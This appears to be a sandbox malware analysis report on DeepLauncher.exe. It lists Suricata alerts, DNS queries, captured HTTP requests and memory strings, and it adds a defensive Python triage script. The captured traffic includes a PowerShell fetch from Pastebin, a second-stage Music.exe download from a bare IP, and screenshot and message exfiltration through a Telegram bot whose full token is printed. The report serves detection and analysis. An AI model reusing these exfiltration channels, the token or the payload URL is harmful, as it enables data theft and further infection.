Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.EventBasedAsync\Release\net8.0\System.ComponentModel.EventBasedAsync.pdb source: DeepLauncher.exe, 00000000.00000002.2566373042.00000233C5571000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.CoreLib.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2566427663.00000233C5580000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdb source: DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A18000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A10000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Drawing.Primitives\Release\net8.0-windows\System.Drawing.Primitives.pdb source: DeepLauncher.exe, 00000000.00000002.2562816385.000001F3306E0000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562792361.000001F3306D1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.pdb source: powershell.exe, 00000008.00000002.1386081536.0000024104360000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: DeepLauncher.exe, 00000000.00000002.2566297559.00000233C5531000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566027392.00000233C5400000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Drawing.Primitives.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2562816385.000001F3306E0000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562792361.000001F3306D1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Collections.Specialized.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2563012536.000001F330710000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562892333.000001F3306F1000.00000020.00001000.00020000.00000000.sdmp

Networking

Source: Network traffic | Suricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.7:49892 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49917 -> 149.154.167.220:443
Source: unknown | DNS query: name: pastebin.com
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | TCP traffic: 192.168.2.7:60607 -> 162.159.36.2:53
Source: global traffic | HTTP traffic detected: POST /bot7996264390:AAGcousd9x1F2KPKs4fpu1cdEMk88F3jG7I/sendPhoto?chat_id=5829712415 HTTP/1.1 | Host: api.telegram.org | Content-Type: multipart/form-data; boundary="8d5826e4-873e-4468-9dee-7b0d8e150bbe" | Content-Length: 681707
Source: global traffic | HTTP traffic detected: POST /bot7996264390:AAGcousd9x1F2KPKs4fpu1cdEMk88F3jG7I/sendMessage HTTP/1.1 | Host: api.telegram.org | Content-Type: application/x-www-form-urlencoded | Content-Length: 270
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: api.ipify.org
Source: global traffic | HTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1 | Host: ip-api.com
Source: global traffic | HTTP traffic detected: GET /Music.exe HTTP/1.1 | Host: 72.5.43.195
Source: Joe Sandbox View | IP Address: 104.20.3.235
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: api.ipify.org (2 occurrences)
Source: unknown | DNS query: name: ip-api.com
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49880 -> 104.26.12.205:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49886 -> 208.95.112.1:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49912 -> 72.5.43.195:80
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49705 -> 104.20.3.235:443
Source: global traffic | HTTP traffic detected: GET /raw/WHKzW2nr HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 72.5.43.195 (6 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2 (4 occurrences)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (5 occurrences)
Source: global traffic | DNS traffic detected: DNS query: pastebin.com
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
Source: unknown | HTTP traffic detected: POST /bot7996264390:AAGcousd9x1F2KPKs4fpu1cdEMk88F3jG7I/sendPhoto?chat_id=5829712415 HTTP/1.1 | Host: api.telegram.org | Content-Type: multipart/form-data; boundary="8d5826e4-873e-4468-9dee-7b0d8e150bbe" | Content-Length: 681707
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 17 Feb 2025 18:47:07 GMT | Server: Apache/2.4.52 (Ubuntu) | Content-Length: 273 | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at 72.5.43.195 Port 80</address></body></html>
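The requests above are the whole network side of this sample: a public-IP lookup (api.ipify.org, then ip-api.com queried with the address it returned), a second-stage fetch from a bare IP (the 404 response recorded just above shows Music.exe was not served during this run), and exfiltration through the Telegram Bot API, where bot id, token and chat_id ride in the URL path and query string. The Python below is an added triage example, not the report's or the sample's own code: it parses the report's request lines (reassembled here with proper line breaks) and returns findings plus the Telegram identifiers needed for an abuse report. The host lists and finding names are this example's own choices.

```python
import re
from urllib.parse import parse_qs

# Telegram Bot API paths carry the credential: /bot<bot_id>:<token>/<method>
TELEGRAM_BOT = re.compile(r"^/bot(?P<bot_id>\d+):(?P<token>[A-Za-z0-9_-]{20,})/(?P<method>\w+)$")
IP_LOOKUP_HOSTS = {"api.ipify.org", "ip-api.com", "ifconfig.me", "icanhazip.com", "checkip.amazonaws.com"}
PASTE_HOSTS = {"pastebin.com", "paste.ee", "rentry.co"}
BARE_IP = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
PAYLOAD_EXT = (".exe", ".dll", ".ps1", ".bat", ".vbs", ".scr")


def parse_request(raw: str) -> dict:
    """Split an HTTP/1.1 request head (request line + headers) into its parts."""
    lines = [ln for ln in re.split(r"\r?\n", raw.strip()) if ln]
    method, target, _version = lines[0].split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "query": query, "headers": headers}


def triage(raw: str) -> dict:
    """Findings for one request, plus Telegram IOCs when the Bot API is used.
    Only a prefix of the bot token is surfaced; the full token is a credential."""
    req = parse_request(raw)
    host = req["headers"].get("host", "").split(":")[0].lower()
    findings, ioc = [], {}
    m = TELEGRAM_BOT.match(req["path"])
    if host == "api.telegram.org" and m:
        findings.append("telegram_bot_api")
        ioc = {"bot_id": m["bot_id"], "token_prefix": m["token"][:4] + "...", "method": m["method"]}
        chat = parse_qs(req["query"]).get("chat_id")
        if chat:
            ioc["chat_id"] = chat[0]
    if host in PASTE_HOSTS and req["path"].startswith("/raw/"):
        findings.append("paste_site_raw")
    if host in IP_LOOKUP_HOSTS:
        findings.append("public_ip_lookup")
    if BARE_IP.match(host) and req["path"].lower().endswith(PAYLOAD_EXT):
        findings.append("executable_from_bare_ip")
    if "user-agent" not in req["headers"]:
        findings.append("no_user_agent")
    return {"host": host, "method": req["method"], "findings": findings, "ioc": ioc}


# Request heads copied from this report, re-split onto header lines.
SAMPLES = {
    "telegram_photo": (
        "POST /bot7996264390:AAGcousd9x1F2KPKs4fpu1cdEMk88F3jG7I/sendPhoto?chat_id=5829712415 HTTP/1.1\r\n"
        "Host: api.telegram.org\r\n"
        'Content-Type: multipart/form-data; boundary="8d5826e4-873e-4468-9dee-7b0d8e150bbe"\r\n'
        "Content-Length: 681707\r\n"),
    "telegram_message": (
        "POST /bot7996264390:AAGcousd9x1F2KPKs4fpu1cdEMk88F3jG7I/sendMessage HTTP/1.1\r\n"
        "Host: api.telegram.org\r\nContent-Type: application/x-www-form-urlencoded\r\n"
        "Content-Length: 270\r\n"),
    "pastebin": (
        "GET /raw/WHKzW2nr HTTP/1.1\r\n"
        "User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682\r\n"
        "Host: pastebin.com\r\nConnection: Keep-Alive\r\n"),
    "ipify": "GET / HTTP/1.1\r\nHost: api.ipify.org\r\n",
    "ip_api": "GET /json/8.46.123.189 HTTP/1.1\r\nHost: ip-api.com\r\n",
    "music_exe": "GET /Music.exe HTTP/1.1\r\nHost: 72.5.43.195\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:16} {triage(raw)}")
```

Because api.telegram.org is reached over TLS, the path and its token are only visible with TLS inspection or on the endpoint (the report captured them through the sandbox's interception), which is why the two Joe Security Suricata rules fire on the decrypted stream; on a production network the DNS query for api.telegram.org from a non-browser process and the missing User-Agent on the plain-HTTP lookups are the signals that survive.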
Source: DeepLauncher.exe | String found in binary or memory: http://.css
Source: DeepLauncher.exe | String found in binary or memory: http://.jpg
Source: DeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563983126.000001F33306F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://72.5.43.195/Music.exe
Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F3330E8000.00000004.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563983126.000001F333123000.00000004.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563983126.000001F333119000.00000004.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563696431.000001F332867000.00000004.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563983126.000001F33310F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://72.5.43.195/Music.exe:
Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F333098000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://72.5.43.195:80/8
Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F33306F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org
Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F33306F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org/
Source: DeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org0
Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F33306F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org:80/8
Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F33303A000.00000004.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.orgnotification_sent.flag
Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F3330E8000.00000004.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563983126.000001F3330C9000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org:443/8
Source: powershell.exe, 00000004.00000002.1576562741.0000017EC73C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000004.00000002.1576562741.0000017EC73C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micft.cMicRosof
Source: DeepLauncher.exe | String found in binary or memory: http://html4/loose.dtd
Source: DeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/json/
Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F333098000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/json/8.46.123.189
Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F333098000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com:80/8
Source: DeepLauncher.exe, 00000000.00000003.1734138389.00000233CD89F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://microsoft.co
Source: DeepLauncher.exe, 00000000.00000003.1662967255.00000233C8ABB000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1663054490.00000233C8AD1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.a.0/sTy
Source: DeepLauncher.exe, 00000000.00000003.1662967255.00000233C8ABB000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1663054490.00000233C8AD1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobe.c.0/ti
Source: DeepLauncher.exe, 00000000.00000003.1662967255.00000233C8ABB000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1663054490.00000233C8AD1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobe.hotosh
Source: DeepLauncher.exe, 00000000.00000003.1662967255.00000233C8ABB000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1663054490.00000233C8AD1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.adoraw-se
Source: DeepLauncher.exe, 00000000.00000003.1662967255.00000233C8ABB000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1663054490.00000233C8AD1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.dob
Source: DeepLauncher.exe, 00000000.00000003.1662967255.00000233C8ABB000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1663054490.00000233C8AD1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.photo/
Source: powershell.exe, 00000004.00000002.1519392910.0000017EBEC63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1485723590.00000220C1B73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1585638365.0000024112EA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1585638365.0000024112D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1817076970.00000174BB37F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.1386081536.00000241042C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com
Source: powershell.exe, 0000000E.00000002.1663607272.00000174AB539000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F333098000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.dataconX
Source: DeepLauncher.exe, 00000000.00000002.2567540441.00000233C5FA0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: DeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/NETdesign.Plugin.Notifer
Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F333098000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/NETdesign.Plugin.Notifer8
Source: powershell.exe, 00000004.00000002.1379163538.0000017EAEE18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1373268730.00000220B1D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1663607272.00000174AB539000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: DeepLauncher.exe, 00000000.00000002.2566297559.00000233C5531000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566027392.00000233C5400000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: DeepLauncher.exe, 00000000.00000002.2566297559.00000233C5531000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2567540441.00000233C5FA0000.00000004.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566027392.00000233C5400000.00000004.10000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1379163538.0000017EAEBF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1373268730.00000220B1B01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1386081536.0000024102CF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1663607272.00000174AB311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
Source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamevhttp://schemas.xmlsoap.o
Source: powershell.exe, 00000004.00000002.1379163538.0000017EAEE18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1373268730.00000220B1D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1663607272.00000174AB539000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000E.00000002.1663607272.00000174AB539000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.1522901895.00000220C9EFE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: powershell.exe, 00000006.00000002.1531770760.00000220C9FA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1534008835.00000220CA137000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000006.00000002.1531770760.00000220C9FA0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co5
Source: DeepLauncher.exe, 00000000.00000002.2566427663.00000233C5580000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: DeepLauncher.exe, 00000000.00000002.2566427663.00000233C5580000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5C73000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A1F000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/binaryformatter
Source: DeepLauncher.exe | String found in binary or memory: https://aka.ms/dotnet-core-applaunch?
Source: DeepLauncher.exe, 00000000.00000002.2566427663.00000233C5580000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5C73000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/dotnet-illink/com
Source: DeepLauncher.exe, 00000000.00000002.2566427663.00000233C5580000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5C73000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/dotnet-illink/nativehost
Source: DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5C73000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/dotnet-illink/nativehostt
Source: DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5C73000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563012536.000001F330710000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566107474.00000233C5430000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2567540441.00000233C5FA0000.00000004.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A10000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562578727.000001F32EF01000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562970930.000001F330701000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A1F000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566027392.00000233C5400000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562892333.000001F3306F1000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563203699.000001F330760000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562624925.000001F32EF10000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563088639.000001F330730000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566221492.00000233C54B1000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563468243.000001F3307A1000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: DeepLauncher.exe | String found in binary or memory: https://aka.ms/dotnet/app-launch-failed
Source: DeepLauncher.exe | String found in binary or memory: https://aka.ms/dotnet/download
Source: DeepLauncher.exe | String found in binary or memory: https://aka.ms/dotnet/download%s%sInstall
Source: DeepLauncher.exe | String found in binary or memory: https://aka.ms/dotnet/info
Source: DeepLauncher.exe | String found in binary or memory: https://aka.ms/dotnet/sdk-not-foundProbing
Source: DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: powershell.exe, 00000004.00000002.1379163538.0000017EAEBF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1373268730.00000220B1B01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1386081536.0000024102CF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1663607272.00000174AB311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A1F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/serializationformat-binary-obsolete
Source: DeepLauncher.exe, 00000000.00000002.2566107474.00000233C5430000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566221492.00000233C54B1000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/systemdrawingnonwindows
Source: DeepLauncher.exe, 00000000.00000002.2569211926.00000233C71A6000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://aka.ms/winforms-warnings/
Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F3330C9000.00000004.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F33303A000.00000004.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendPhoto?chat_id=
